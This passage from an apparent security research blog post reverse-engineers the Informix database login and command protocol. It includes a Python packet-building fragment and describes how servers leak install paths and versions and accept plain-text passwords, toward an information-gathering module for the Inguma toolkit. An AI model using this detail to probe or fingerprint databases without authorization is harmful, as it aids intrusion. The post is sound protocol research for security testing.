<pre>buf = "sq"
buf += base64.b64encode("<b>the total size of the packet</b>").strip("==")
buf += "BPQAAsqlexec"
data = ' %s -p%s %s %s -d%s -f%s DBPATH=%s DBMONEY=%s CLIENT_LOCALE=%s'
data += ' SINGLELEVEL=%s '
data += 'LKNOTIFY=%s LOCKDOWN=%s NODEFDAC=%s CLNT_PAM_CAPABLE=%s '
data = data % (self.username, self.password, self.version, self.serialNumber,
self.databaseName,
self.ieee, self.databasePath, self.databaseMoney,
self.clientLocale,
self.singleLevel, self.lkNotify, self.lockDown,
self.noDefDac,
self.clientPamCapable)
</pre><br />
When the server receives this packet validates the username and the password (which is, BTW, sent in plain text) and, also, the database name if it was passed. Regardless of whether the username and password are valid, the server will always answer with interesting data to the client, such as the install path, complete version, etc... (BTW, there is a working module to gather information from an Informix Database in the private version of Inguma and will be released in the next release).<br />
<br />
The response sent from the server to the client will have the following format: <br />
<br />
<i>"0x00 0x05 0x02 0x00*12 ieee name banner serial dbpath protocol hostname terminal installpath"</i><br />
<br />
The first byte (0x00 or 0x01) is the "isValidUser" byte. If the username and password are OK, the server will answer with a value of 0x01. Otherwise, the value will be 0x0. The 2nd and 3rd bytes indicates if the database selected exists and the user has privilege to connect to. A normal answer (if the database exists and, also, the username & password are both valid) is 0x05 0x02. All the rest of the data are C strings. <br />
<br />
After this, if both username and password are valid, the user may start sending commands in a new (binary) protocol format. The protocol will have the following structure (not 100% accurate...): <br />
<br />
<i>0x00 OPCODE 0x00 0x00 0x00 STRING_DATA 0x00 0x00 0x16 0x00 0x31 0x00 0x0c</i><br />
<br />
The first byte is static and the second one is the OPCODE. The opcode is an index to an internal function pointers array. In example, the OPCODE 0x01 is for executing SQL commands, the OPCODE chr(26) will list all the databases in the server, etc.. These function pointers are stored in the global array "jmpsql".<br />
<br />
Well, I hope that we will release a new version in about 1 month or so with modules for DB2 and Informix.<br />
<br />
Regards,<br />
Joxean KoretInguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com0